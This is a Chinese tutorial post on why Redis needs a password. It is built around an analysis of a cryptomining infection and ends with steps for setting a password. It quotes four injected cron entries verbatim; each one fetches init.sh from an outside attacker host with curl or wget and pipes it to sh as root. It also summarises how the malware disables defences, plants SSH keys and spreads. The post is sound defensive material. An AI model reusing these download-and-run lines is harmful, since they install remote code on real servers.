為什么redis要設置密碼？

內網環(huán)境可以不設置密碼，但是個人服務器，以及線上公網服務器就有必要設置密碼了。

昨天我查看了一下minio的redis事件通知，查看redis的key時發(fā)現(xiàn)多了幾個奇怪的key。backup1，backup2，backup3。然后我猜想應該是挖礦病毒。

如下面所示：這樣就將定時任務和腳本注入到了我們機器當中，就會開始執(zhí)行 init.sh 腳本

backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n"
backup2 "\n\n\n*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"
backup3 "\n\n\n*/4 * * * * root curl -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n"
backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"

init.sh腳本內容是什么？

en2an.top/cleanfda/in…

我們查看這個key的value能得到它會去請求一個地址，我們打開看一下這個init.sh到底是什么東西。

如下圖所示是個腳本文件。

這個腳本還挺多的，關閉selinux、殺掉別人的挖礦進程、殺掉CPU占用過高的進程，如果是自己就跳過、修改破壞系統(tǒng)命令、自己造一個下載器downloads()函數、解鎖和加鎖定時任務、添加挖礦技術任務、設置SSH免密登陸、下載執(zhí)行礦機挖礦程序、關閉防火墻、清除日志、感染已知的免密機器、下載執(zhí)行is.sh。

is.sh腳本內容是什么？

en2an.top/cleanfda/is…

如下圖所示，上面的init.sh會下載我們的is.sh腳本。

我們看一下這個腳本是干什么。

如下圖所示，這個腳本的內容也挺多的。下載masscan掃描器、下載pnscan掃描器、安裝 redis 用于創(chuàng)建 redis 未授權訪問的漏洞、執(zhí)行 rs.sh。

rs.sh腳本內容是什么？

en2an.top/cleanfda/rs…

上面的連接可以查看這個腳本內容是什么。

開放 6379 端口、自動化利用redis未授權寫入定時任務，利用 pnscan 掃描b段IP 6379 端口，利用 masscan 進行掃描端口。

Redis如何設置密碼？

經過以上分析，就知道這個病毒主要是通過你的redis注入進去執(zhí)行挖礦腳本。如果你的redis沒有設置密碼，而且暴露在公網上就要小心了。

可以通過以下兩種方式對我們的redis進行設置密碼。

方式一：修改我們的redis.conf配置文件

需要注意的是這種方式因為修改了配置文件， 需要重新啟動我們的redis才能生效。

找到我們的redis.conf文件。

Windows如下圖所示

我們編輯此文件，找到requirepass，放開注釋，設置指定的值就，重啟redis就生效了。

Linux的話，因為大家的安裝方式可能不同，我這邊是通過docker安裝的，做了映射的。這里就不給大家演示了，找到自己安裝在linux的redis目錄找到redis.conf配置文件，跟windows一樣的操作，配置完重啟就Ok了。

方式二

連接我們的redis，然后通過指令的方式設置密碼。

這種方式比較簡單，而且不需要重啟就生效。

下面的指令的意思就是把密碼設置為123456，公網可不要設置這么簡單阿。

config set requirepass 123456

我們查看一下我們的redis的密碼。

config get requirepass 

這樣我們的密碼就設置成功了，退出我們的redis客戶端再次連接的時候就生效了。

總結

公網的redis一定要設置密碼阿，不要不設置密碼，設置密碼就一個指令，非常容易，可不要偷懶噢。

以上就是一文詳解Redis為什么一定要設置密碼原理的詳細內容，更多關于Redis設置密碼的資料請關注腳本之家其它相關文章！

最新評論